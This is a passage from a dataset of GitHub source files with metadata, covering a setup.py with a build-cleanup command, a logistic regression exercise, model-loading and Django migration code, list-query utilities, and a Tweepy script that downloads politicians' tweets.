wait_check(self, addr, t=1):\n while True:\n time.sleep(t)\n addrs = self.get()\n assert len(addrs) in [1, 2], f'unexcepted addrs length, {addrs}'\n if len(addrs) == 2:\n return addrs\n assert addrs[0] == addr, 'race condition detected!'\n\n def put_one_wait_two(self, addr, t=1):\n self.put([addr])\n addrs = self.wait_check(addr, t)\n assert addrs[0] == addr, f'unexpected addrs order, {addrs}'\n return addrs[1] # returns the new/dst addr\n\n\ndef get_avail_port():\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.bind(('127.0.0.1', 0))\n return s.getsockname()[1]\n", "repo_name": "TheYoke/punching-proxy", "sub_path": "helpers.py", "file_name": "helpers.py", "file_ext": "py", "file_size_in_byte": 3110, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "requests.Session", "line_number": 20, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 34, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 83, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 85, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 89, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 104, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 104, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 104, "usage_type": "attribute"}]} +{"seq_id": "2119172109", "text": "from setuptools import setup,find_packages,Command\nfrom hammr.utils.constants import *\nimport os\n\n\nROOT_DIR = os.path.dirname(os.path.realpath(__file__))\n\n\n# Declare your packages' dependencies here, for eg:\n# Always put an '==' dependency with uforge_python_sdk during the release\n# During dev we can keep >= in order to get nightly version of sdk for the CI 
\nrequires=['uforge_python_sdk>=3.8.13',\n          'httplib2==0.9',\n          'texttable==0.8.1',\n          'progressbar==2.3',\n          'argparse',\n          'paramiko==1.12',\n          'pyparsing==2.0.2',\n          'pyyaml==3.12',\n          'hurry.filesize==0.9',\n          'termcolor==1.1.0',\n          'junit-xml==1.3',\n          'xmlrunner==1.7.7',\n          'ussclicore==1.0.11']\n\ntest_requires=['mock']\n\n\nclass CleanCommand(Command):\n    \"\"\"Custom clean command to tidy up the project root.\"\"\"\n    user_options = []\n    def initialize_options(self):\n        pass\n    def finalize_options(self):\n        pass\n    def run(self):\n        os.system('rm -vrf '+ROOT_DIR+'/build '+ROOT_DIR+'/dist '+ROOT_DIR+'/*.pyc '+ROOT_DIR+'/*.egg-info')\n        os.system('find '+ROOT_DIR+' -iname \"*.pyc\" -exec rm {} +')\n\nsetup (\n\n    install_requires=requires,\n    tests_require = test_requires,\n\n    # Fill in these to make your Egg ready for upload to\n    # PyPI\n    name = 'hammr',\n    version = VERSION,\n    description='Command-line tool for building consistent and repeatable machine images for multiple cloud platforms',\n    long_description='command-line tool for building/publishing/migrating consistent machine images for virtual datacenters and cloud platforms',\n    packages = find_packages(),\n    author = 'Joris Bremond',\n    author_email = 'joris.bremond@usharesoft.com',\n    license=\"Apache License 2.0\",\n    classifiers=(\n        'Development Status :: 4 - Beta',\n        'Environment :: Console',\n        'Intended Audience :: Developers',\n        'Intended Audience :: System Administrators',\n        'Natural Language :: English',\n        'Operating System :: MacOS :: MacOS X',\n        'Operating System :: Microsoft :: Windows',\n        'Operating System :: POSIX',\n        'License :: OSI Approved :: Apache Software License',\n        'Programming Language :: Python',\n        'Programming Language :: Python :: 2.7',\n    ),\n    \n    # ... custom build command\n    cmdclass={\n        'clean': CleanCommand,\n    },\n\n    #long_description= 'Long description of the package',\n    scripts = ['bin/hammr', 'bin/hammr.bat'],\n    \n)\n", "repo_name": "usharesoft/hammr", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 2589, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 28, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.path.dirname", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 6, "usage_type": "call"}, {"api_name": "setuptools.Command", "line_number": 29, "usage_type": "name"}, {"api_name": "os.system", "line_number": 37, "usage_type": "call"}, {"api_name": "os.system", "line_number": 38, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 40, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 51, "usage_type": "call"}]}
+{"seq_id": "24702405544", "text": "# Importing libraries\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split #Used to split the dataset\n\n# Logistic Regression\nclass LogitRegression():\n    def __init__(self, learning_rate, iterations):\n        self.learning_rate = learning_rate\n        self.iterations = iterations\n\n    # Function for model training\n    def fit(self, X, Y):\n        # no_of_training_examples, no_of_features\n        self.m, self.n = X.shape\n        # w=weight b=bias\n        self.W = np.zeros(self.n)\n        self.b = 0\n        self.X = X\n        self.Y = Y\n\n        # gradient descent learning\n\n        for i in range(self.iterations):\n            self.update_weights()\n        return self\n\n    # Helper function to update weights in gradient descent\n\n    def update_weights(self):\n        A = 1 / (1 + np.exp(- 
(self.X.dot(self.W) + self.b)))\n\n        # calculate gradients\n        tmp = (A - self.Y.T)\n        tmp = np.reshape(tmp, self.m)\n        dW = np.dot(self.X.T, tmp) / self.m\n        db = np.sum(tmp) / self.m\n\n        # updating simultaneously\n        self.W = self.W - self.learning_rate * dW\n        self.b = self.b - self.learning_rate * db\n\n        return self\n\n    # Hypothetical function h(x)\n    def predict(self, X):\n        Z = 1 / (1 + np.exp(- (X.dot(self.W) + self.b)))\n        Y = np.where(Z > 0.5, 1, 0)\n        return Y\n\n#Main function\n\n# Importing the dataset (I converted my dataset to have only the fare, age and survived beforehand)\ndf = pd.read_csv(\"TitanicData.csv\")\ndf=df.dropna()\nX = df.iloc[:, :-1].values\nY = df.iloc[:, -1:].values\n\n# Splitting dataset into train and test set, using sklearn since I couldn't figure out how to do it otherwise\nX_train, X_test, Y_train, Y_test = train_test_split(\n    X, Y, test_size=1 / 3, random_state=0)\n\n\n\n# Training the model\nmodel = LogitRegression(learning_rate=0.01, iterations=1000)\nmodel.fit(X_train, Y_train)\n\n# Prediction on test set\nY_pred = model.predict(X_test)\n\n\n# measuring the performance\nRight_classification = 0\n#Counter\ncount = 0\nfor count in range(np.size(Y_pred)):\n\n    if Y_test[count] == Y_pred[count]:\n        Right_classification = Right_classification + 1\n    count = count + 1\n\nprint(\"Accuracy on test set by our Logistic Regression model : \", (\n    Right_classification / count) * 100)\n\n\n", "repo_name": "SiddhantGupta101/ISA_TP", "sub_path": "Week 1 (Logistic Regression)/LogisticRegression.py", "file_name": "LogisticRegression.py", "file_ext": "py", "file_size_in_byte": 2313, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.zeros", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 48, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 54, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.size", "line_number": 77, "usage_type": "call"}]}
+{"seq_id": "3626080614", "text": "import os\nimport torch\nimport torch.nn as nn\nimport sys \n\nfrom transformers import (\n    AutoConfig,\n    AutoModelForSeq2SeqLM,\n    AutoTokenizer,\n)\n\ndef copy_layers(src_enc, dest_enc):\n    #copy_src_dec_module = nn.ModuleList(src_dec._modules['block'])\n    #dest_dec._modules['block'].load_state_dict(copy_src_dec_module.state_dict())\n    copy_src_enc_module = nn.ModuleList(src_enc._modules['block'])\n    dest_enc._modules['block'].load_state_dict(copy_src_enc_module.state_dict())\n\n\ndef load_model_tokenizer(training_arg):\n    tokenizer = AutoTokenizer.from_pretrained(\n        training_arg.model_chkpt,\n        use_fast=False, \n        cache_dir=training_arg.cache_dir,\n    )\n    special_tokens = {\"eos_token\": tokenizer.eos_token, \"pad_token\": tokenizer.pad_token, \\\n        \"sep_token\": tokenizer.eos_token, \"unk_token\": tokenizer.unk_token}\n    tokenizer.add_special_tokens(special_tokens)\n\n    config = AutoConfig.from_pretrained(\n        training_arg.model_chkpt,\n        cache_dir=training_arg.cache_dir,\n        bos_token_id= tokenizer.bos_token_id,\n        eos_token_id= tokenizer.eos_token_id,\n        
sep_token_id= tokenizer.sep_token_id,\n pad_token_id= tokenizer.pad_token_id,\n unk_token_id= tokenizer.unk_token_id,\n output_hidden_states=False\n )\n\n model = AutoModelForSeq2SeqLM.from_pretrained(\n training_arg.model_chkpt,\n config=config,\n cache_dir=training_arg.cache_dir,\n )\n mix_model = AutoModelForSeq2SeqLM.from_pretrained(\n training_arg.model_chkpt,\n config=config,\n cache_dir=training_arg.cache_dir,\n )\n \n copy_layers(model.encoder, mix_model.encoder)\n copy_layers(model.encoder, mix_model.keyencoder)\n\n \n mix_model.save_pretrained(\"proposed_model\")\n\n \n return mix_model, tokenizer", "repo_name": "kaushal0494/DivHSK", "sub_path": "model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 1836, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "torch.nn.ModuleList", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 20, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 20, "usage_type": "name"}, {"api_name": "transformers.AutoConfig.from_pretrained", "line_number": 29, "usage_type": "call"}, {"api_name": "transformers.AutoConfig", "line_number": 29, "usage_type": "name"}, {"api_name": "transformers.AutoModelForSeq2SeqLM.from_pretrained", "line_number": 40, "usage_type": "call"}, {"api_name": "transformers.AutoModelForSeq2SeqLM", "line_number": 40, "usage_type": "name"}, {"api_name": "transformers.AutoModelForSeq2SeqLM.from_pretrained", "line_number": 45, "usage_type": "call"}, {"api_name": "transformers.AutoModelForSeq2SeqLM", "line_number": 45, "usage_type": "name"}]} +{"seq_id": "2359655414", "text": "'''\nCreated on Jun 24, 2012\n\n@author: anana\n'''\n# Python imports\nimport re\n\n# BioPython imports\nfrom Bio.Seq import Seq\nfrom Bio.Alphabet import IUPAC\n\n# data analysis imports\nfrom data_analysis.containers.ProteinContainer import ProteinContainer\nfrom data_analysis.translation.TranslationUtils import translate_ensembl_exons\n\n\n\nclass EnsemblAlignment (object):\n '''\n Place holder for ensembl exons from species \n that correspond to the alignment with the human exon.\n '''\n \n def __init__ (self, ref_protein_id, ref_exon, alignment_exon, ensembl_exons):\n \n self.ref_protein_id = ref_protein_id\n self.ref_exon = ref_exon\n self.alignment_exon = alignment_exon\n self.ensembl_exons = ensembl_exons\n self.set_protein_sequences ()\n \n def set_protein_sequences (self):\n '''\n Find the right translation frame and \n translate the alignment piece to protein.\n Find the location on the referent protein.\n '''\n\n pc = ProteinContainer.Instance()\n \n ref_protein = pc.get(self.ref_protein_id)\n ref_protein_seq = ref_protein.get_sequence_record().seq\n partial_ref_seq = Seq(self.alignment_exon.alignment_info[\"sbjct_seq\"].replace(\"-\",\"\"), IUPAC.ambiguous_dna)\n \n \n complete_protein_exon_seq = self.ref_exon.sequence [self.ref_exon.frame:].translate()\n if str(complete_protein_exon_seq).endswith(\"*\"):\n complete_protein_exon_seq = complete_protein_exon_seq[0:len(complete_protein_exon_seq)-1]\n\n exon_prot_start = str(ref_protein_seq).find(str(complete_protein_exon_seq))\n exon_prot_stop = exon_prot_start + len(complete_protein_exon_seq)\n \n for frame in (0,1,2):\n partial_protein_ref_seq = partial_ref_seq[frame:].translate()\n if str(partial_protein_ref_seq).endswith(\"*\"):\n 
partial_protein_ref_seq = partial_protein_ref_seq[0:len(partial_protein_ref_seq)-1]\n found = False\n \n if str(complete_protein_exon_seq).find (str(partial_protein_ref_seq)) != -1:\n for a in list(re.finditer(str(partial_protein_ref_seq), str(ref_protein_seq))): \n if a.start() >= exon_prot_start and a.end() <= exon_prot_stop:\n self.ref_protein_seq = partial_protein_ref_seq\n self.ref_protein_start = a.start()\n self.ref_protein_stop = a.end()\n found = True\n break\n if found:\n break\n \n self.spec_protein_seq = translate_ensembl_exons(self.ensembl_exons)\n \n \n def get_cDNA (self, len_so_far):\n \n rest = len_so_far % 3\n \n total_exon_len = len(self.ref_exon.sequence) \n alignment_start = self.alignment_exon.alignment_info[\"sbjct_start\"]\n padded_cdna = \"N\"* (alignment_start-1)\n len_added = 0\n \n new_frame = (3-(self.ensembl_exons[0].relative_start - self.ensembl_exons[0].frame)%3)%3\n if new_frame == 0:\n if rest != 0:\n padded_cdna += \"N\"* (3-rest)\n elif new_frame == 1:\n if rest != 2:\n padded_cdna += \"N\" *(2-rest)\n else:\n if rest != 1:\n if rest == 2:\n padded_cdna += \"N\"*2\n else:\n padded_cdna += \"N\"\n \n for ens_exon in self.ensembl_exons:\n coding_part = ens_exon.sequence[ens_exon.relative_start:ens_exon.relative_stop]\n padded_cdna += coding_part\n len_added = len(padded_cdna)\n \n padded_cdna += \"N\" * (total_exon_len-len_added)\n return padded_cdna\n \n ", "repo_name": "abulovic/SuperExonRetriver2000", "sub_path": "ExoLocator/data_analysis/translation/EnsemblAlignment.py", "file_name": "EnsemblAlignment.py", "file_ext": "py", "file_size_in_byte": 3859, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "data_analysis.containers.ProteinContainer.ProteinContainer.Instance", "line_number": 40, "usage_type": "call"}, {"api_name": "data_analysis.containers.ProteinContainer.ProteinContainer", "line_number": 40, "usage_type": "name"}, {"api_name": "Bio.Seq.Seq", "line_number": 44, "usage_type": "call"}, {"api_name": "Bio.Alphabet.IUPAC.ambiguous_dna", "line_number": 44, "usage_type": "attribute"}, {"api_name": "Bio.Alphabet.IUPAC", "line_number": 44, "usage_type": "name"}, {"api_name": "re.finditer", "line_number": 61, "usage_type": "call"}, {"api_name": "data_analysis.translation.TranslationUtils.translate_ensembl_exons", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "22177942767", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0002_post_data'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='post',\n name='startups',\n field=models.ManyToManyField(related_name='blog_posts', blank=True, to='organizer.Startup'),\n ),\n migrations.AlterField(\n model_name='post',\n name='tags',\n field=models.ManyToManyField(related_name='blog_posts', blank=True, to='organizer.Tag'),\n ),\n ]\n", "repo_name": "oumabaros/suorganizer", "sub_path": "suorganizer/blog/migrations/0003_auto_20220605_0926.py", "file_name": "0003_auto_20220605_0926.py", "file_ext": "py", "file_size_in_byte": 643, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", 
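A minimal standalone sketch of the three-frame translation search used in the EnsemblAlignment record above (hypothetical helper, assuming Biopython's Seq API; not code from the repository):

from Bio.Seq import Seq

def find_reading_frame(dna, target_protein):
    # Try each forward frame; return the first whose translation (trailing
    # stop codon stripped) occurs in the target protein sequence.
    for frame in (0, 1, 2):
        trimmed = dna[frame:]
        trimmed = trimmed[:len(trimmed) - len(trimmed) % 3]  # whole codons only
        fragment = str(Seq(trimmed).translate()).rstrip("*")
        if fragment and fragment in target_protein:
            return frame, fragment
    return None, None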
"line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}]} +{"seq_id": "18431410298", "text": "\nimport collections\nimport itertools\nfrom operator import itemgetter\nfrom pprint import pprint\nimport random\nimport sys\n\nfrom lib.math_utils import *\n\ndef addIndices(arr, keyName=\"index\", startIndex=0):\n for i, item in enumerate(arr):\n arr[i][keyName] = startIndex + i\n return arr\n\ndef addValueToStringOrList(strOrArr, value):\n if value == \"\":\n return strOrArr\n values = value\n if not isinstance(value, list):\n values = [str(value).strip()]\n if not isinstance(strOrArr, list):\n strOrArr = str(strOrArr).strip()\n if strOrArr == \"\":\n strOrArr = []\n else:\n strOrArr = [strOrArr]\n strOrArr = [str(v).strip() for v in strOrArr]\n for value in values:\n if value not in strOrArr:\n strOrArr.append(value)\n return strOrArr\n\ndef createLookup(arr, key):\n return dict([(str(item[key]), item) for item in arr])\n\ndef findByValue(arr, key, value):\n found = None\n for item in arr:\n if key in item and item[key] == value:\n found = item\n break\n return found\n\ndef filterByQuery(arr, ors, delimeter=\"|\", caseSensitive=False):\n if isinstance(ors, tuple):\n ors = [[ors]]\n # pprint(ors)\n\n if len(ors) < 1:\n return arr\n\n # print(\"===============\")\n # pprint(ors)\n # print(\"===============\")\n\n results = []\n for item in arr:\n for ands in ors:\n andValid = True\n for key, comparator, value in ands:\n value = str(value)\n itemValue = str(item[key])\n if not caseSensitive:\n value = value.lower()\n itemValue = itemValue.lower()\n if comparator not in [\"CONTAINS\", \"EXCLUDES\", \"CONTAINS LIST\", \"EXCLUDES LIST\", \"IN LIST\", \"NOT IN LIST\"]:\n value = parseNumber(value)\n itemValue = parseNumber(itemValue)\n if comparator in [\"IN LIST\", \"NOT IN LIST\", \"CONTAINS LIST\", \"EXCLUDES LIST\"]:\n value = [v.strip() for v in value.split(delimeter)]\n if comparator == \"<=\" and itemValue > value:\n andValid = False\n break\n elif comparator == \">=\" and itemValue < value:\n andValid = False\n break\n elif comparator == \"<\" and itemValue >= value:\n andValid = False\n break\n elif comparator == \">\" and itemValue <= value:\n andValid = False\n break\n elif comparator == \"IN LIST\" and itemValue not in value:\n andValid = False\n break\n elif comparator == \"NOT IN LIST\" and itemValue in value:\n andValid = False\n break\n elif comparator == \"CONTAINS LIST\":\n andValid = False\n for v in value:\n if v in itemValue:\n andValid = True\n break\n break\n elif comparator == \"EXCLUDES LIST\":\n for v in value:\n if v in itemValue:\n andValid = False\n break\n break\n elif comparator == \"CONTAINS\" and value not in itemValue:\n andValid = False\n break\n elif comparator == \"EXCLUDES\" and value in itemValue:\n andValid = False\n break\n elif comparator == \"!=\" and itemValue == value:\n andValid = False\n break\n elif comparator == \"=\" and itemValue != value:\n andValid = False\n break\n if andValid:\n 
results.append(item)\n break\n return results\n\ndef filterByQueryString(arr, str):\n queries = [parseQueryString(str) for str in str.split(\" | \")]\n filteredArr = arr[:]\n for query in queries:\n filteredArr = filterByQuery(filteredArr, query)\n return filteredArr\n\ndef flattenList(arr):\n return [item for sublist in arr for item in sublist]\n\ndef getCountPercentages(arr, key, presence=False, otherTreshhold=None, excludeEmpty=False):\n if excludeEmpty:\n arr = [item for item in arr if key in item and str(item[key]).strip() != \"\"]\n arrLen = len(arr)\n counts = getCounts(arr, key, presence)\n data = []\n for value, count in counts:\n if value == \"\":\n if excludeEmpty:\n continue\n value = \"\"\n percent = round(1.0 * count / arrLen * 100.0, 2)\n data.append({\"value\": value, \"percent\": percent, \"count\": count})\n # always make \"yes\" first\n if presence:\n data = sorted(data, key=lambda d: d[\"value\"], reverse=True)\n if otherTreshhold is not None and len(data) > otherTreshhold:\n otherData = data[otherTreshhold:]\n data = data[:otherTreshhold]\n otherCount = sum([d[\"count\"] for d in otherData])\n otherPercent = sum([d[\"percent\"] for d in otherData])\n otherPercent = round(otherPercent, 2)\n data.append({\"value\": \"other\", \"percent\": otherPercent, \"count\": otherCount})\n return data\n\ndef getCounts(arr, key=False, presence=False):\n values = arr[:]\n if key is not False:\n values = []\n for item in arr:\n value = \"\"\n if key in item:\n value = item[key]\n if isinstance(value, list) and not presence:\n values += value\n else:\n values.append(value)\n values = [str(v).strip() for v in values]\n if presence:\n values = [\"no\" if len(v) < 1 else \"yes\" for v in values]\n counter = collections.Counter(values)\n return counter.most_common()\n\ndef groupList(arr, groupBy, sort=False, desc=True):\n groups = []\n arr = sorted(arr, key=itemgetter(groupBy))\n for key, items in itertools.groupby(arr, key=itemgetter(groupBy)):\n group = {}\n litems = list(items)\n count = len(litems)\n group[groupBy] = key\n group[\"items\"] = litems\n group[\"count\"] = count\n groups.append(group)\n if sort:\n reversed = desc\n groups = sorted(groups, key=lambda k: k[\"count\"], reverse=reversed)\n return groups\n\ndef parseQueryString(str):\n if len(str) <= 0:\n return []\n comparators = [\"<=\", \">=\", \" NOT IN LIST \", \" IN LIST \", \" EXCLUDES LIST \", \" CONTAINS LIST \", \" EXCLUDES \", \" CONTAINS \", \"!=\", \">\", \"<\", \"=\"]\n orStrings = str.split(\" OR \")\n ors = []\n for orString in orStrings:\n andStrings = orString.split(\" AND \")\n ands = []\n for andString in andStrings:\n for comparator in comparators:\n if comparator in andString:\n parts = [part.strip() for part in andString.split(comparator)]\n ands.append(tuple([parts[0], comparator.strip(), parts[1]]))\n break\n ors.append(ands)\n return ors\n\ndef parseSortString(str):\n if len(str) <= 0:\n return []\n conditionStrings = str.split(\" AND \")\n conditions = []\n for cs in conditionStrings:\n if \"=\" in cs:\n parts = cs.split(\"=\")\n conditions.append(tuple(parts))\n else:\n conditions.append((cs, \"asc\"))\n return conditions\n\ndef prependAll(arr, prepends):\n if isinstance(prepends, tuple):\n prepends = [prepends]\n\n for i, item in enumerate(arr):\n for p in prepends:\n newKey = None\n if len(p) == 3:\n key, value, newKey = p\n else:\n key, value = p\n newKey = key\n arr[i][newKey] = value + item[key]\n\n return arr\n\ndef removeValueFromStringOrList(strOrArr, value):\n if value == \"\":\n return 
strOrArr\n values = value\n if not isinstance(value, list):\n values = [str(value).strip()]\n if not isinstance(strOrArr, list):\n strOrArr = str(strOrArr).strip()\n if strOrArr == \"\":\n strOrArr = []\n else:\n strOrArr = [strOrArr]\n strOrArr = [str(v).strip() for v in strOrArr]\n strOrArr = [v for v in strOrArr if v not in values]\n if len(strOrArr) < 1:\n strOrArr = \"\"\n return strOrArr\n\ndef sortBy(arr, sorters, targetLen=None):\n if isinstance(sorters, tuple):\n sorters = [sorters]\n\n if len(arr) <= 0:\n return arr\n\n # Sort array\n for s in sorters:\n trim = 1.0\n if len(s) > 2:\n key, direction, trim = s\n trim = float(trim)\n else:\n key, direction = s\n reversed = (direction == \"desc\")\n\n if key == \"random\":\n random.shuffle(arr)\n else:\n arr = sorted(arr, key=lambda k: k[key], reverse=reversed)\n\n if 0.0 < trim < 1.0:\n count = int(round(len(arr) * trim))\n if targetLen is not None:\n count = max(count, targetLen)\n arr = arr[:count]\n\n if targetLen is not None and len(arr) > targetLen:\n arr = arr[:targetLen]\n\n return arr\n\ndef sortByQueryString(arr, sortString, targetLen=None):\n sorters = parseSortString(sortString)\n\n if len(sorters) <= 0:\n return arr\n\n return sortBy(arr, sorters, targetLen)\n\ndef unique(arr):\n return list(set(arr))\n", "repo_name": "MonumentLab/national-monument-audit", "sub_path": "lib/collection_utils.py", "file_name": "collection_utils.py", "file_ext": "py", "file_size_in_byte": 9519, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "41", "api": [{"api_name": "collections.Counter", "line_number": 170, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 175, "usage_type": "call"}, {"api_name": "itertools.groupby", "line_number": 176, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 176, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 272, "usage_type": "call"}]} +{"seq_id": "74249602364", "text": "from tweepy import OAuthHandler, API, error\nimport pandas as pd\nimport os\nimport time\n\n\ndef get_twitter_api():\n # twitterkey.py is saving personal twitter keys as env variable\n import src.twitterkey\n\n # get api keys\n consumer_key = os.getenv('USER_KEY')\n consumer_secret = os.getenv('USER_SECRET')\n access_token = os.getenv('ACCESS_TOKEN')\n access_token_secret = os.getenv('ACCESS_TOKEN_SECRET')\n\n # Setup Tweepy\n auth = OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = API(auth)\n\n return api\n\n\ndef get_user_tweets(api, users: list, save_path: str = None) -> pd.DataFrame:\n \"\"\"Extract all tweets from users\"\"\"\n # code based on https://fairyonice.github.io/extract-someones-tweet-using-tweepy.html\n\n # initializing DataFrame (from saved pickle or empty)\n if os.path.isfile(save_path + '.pkl'):\n tweets_df = pd.read_pickle(save_path + '.pkl')\n # remove already downloaded users from list\n for user in tweets_df['user'].unique():\n users.remove(user)\n else:\n tweets_df = pd.DataFrame()\n\n print(f'Downloading tweets from {len(users)} users')\n\n def download_tweets(user):\n \"\"\"Internal function to download all tweets of a user\"\"\"\n all_tweets = list()\n # get first 200 tweets\n tweets = api.user_timeline(screen_name=user,\n # 200 is the maximum allowed count\n count=200,\n include_rts=False,\n # Necessary to keep full_text\n # otherwise only the first 140 words are extracted\n tweet_mode='extended'\n )\n 
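        # (annotation, not in the original script: the call above fetches the
        # newest page of the timeline, and the loop below walks backwards
        # through older tweets via max_id=oldest_id - 1, Twitter's standard
        # pagination scheme. tweepy.Cursor(api.user_timeline, ...) can
        # automate the same walk.)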
all_tweets.extend(tweets)\n\n if len(all_tweets) == 0:\n # return empty DataFrame for users without tweets\n return pd.DataFrame([])\n\n oldest_id = tweets[-1].id\n\n # get all following tweets\n while True:\n tweets = api.user_timeline(screen_name=user,\n # 200 is the maximum allowed count\n count=200,\n include_rts=False,\n max_id=oldest_id - 1,\n # Necessary to keep full_text\n # otherwise only the first 140 words are extracted\n tweet_mode='extended'\n )\n if len(tweets) == 0:\n break\n oldest_id = tweets[-1].id\n all_tweets.extend(tweets)\n\n print(f'Number of tweets downloaded from user {user}: {len(all_tweets)}')\n\n # save tweets per user in a DataFrame\n user_tweets = pd.DataFrame([[\n tweet.id_str,\n tweet.created_at,\n tweet.favorite_count,\n tweet.retweet_count,\n tweet.source,\n tweet.truncated,\n tweet.in_reply_to_status_id_str,\n tweet.lang,\n tweet.entities['hashtags'],\n tweet.full_text.encode(\"utf-8\").decode(\"utf-8\")]\n for tweet in all_tweets],\n columns=[\"id\", \"created_at\", \"favorite_count\", \"retweet_count\", \"source\", \"truncated\",\n \"reply_to\", \"language\", \"hashtags\", \"text\"])\n user_tweets['user'] = user\n\n return user_tweets\n\n for user in users:\n try:\n user_tweets = download_tweets(user)\n\n except error.RateLimitError:\n # Tweepy has a rate limit for requests. If the rate limit is reached, the process sleeps for 15 minutes\n # save tweets\n if save_path:\n tweets_df.to_csv(save_path + '.csv')\n tweets_df.to_pickle(save_path + '.pkl')\n\n print(f'Reached rate limit from tweepy after {len(tweets_df.user.unique())} users. Paused for 15 minutes\\n')\n time.sleep(900)\n # repeat request\n user_tweets = download_tweets(user)\n\n except error.TweepError:\n # User does not exist\n user_tweets = pd.DataFrame([])\n pass\n\n # Add user_tweets to overall DataFrame\n tweets_df = tweets_df.append(user_tweets, ignore_index=True)\n\n print(f'Downloaded tweets from {len(tweets_df.user.unique())} users')\n\n # save tweets\n if save_path:\n tweets_df.to_csv(save_path + '.csv')\n tweets_df.to_pickle(save_path + '.pkl')\n\n return tweets_df\n\n\nif __name__ == '__main__':\n # connect to twitter\n api = get_twitter_api()\n\n # get twitter names\n users_df = pd.read_excel('data/congress_twitter_accounts.xlsx')\n print(f'Read {len(users_df)} politicians')\n # drop politicians without twitter accounts\n users_df = users_df.dropna(subset=['user'])\n\n print(f'Found {len(users_df)} twitter accounts')\n\n # load and save tweets\n tweets_df = get_user_tweets(api, users_df['user'], save_path='data/tweets_raw')\n\n\n", "repo_name": "blumenstiel/PoliticalSentimentAnalysis", "sub_path": "src/data/get_tweets.py", "file_name": "get_tweets.py", "file_ext": "py", "file_size_in_byte": 5133, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.getenv", "line_number": 12, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 13, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 14, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 15, "usage_type": "call"}, {"api_name": "tweepy.OAuthHandler", "line_number": 18, "usage_type": "call"}, {"api_name": "tweepy.API", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 31, "usage_type": "call"}, {"api_name": "pandas.DataFrame", 
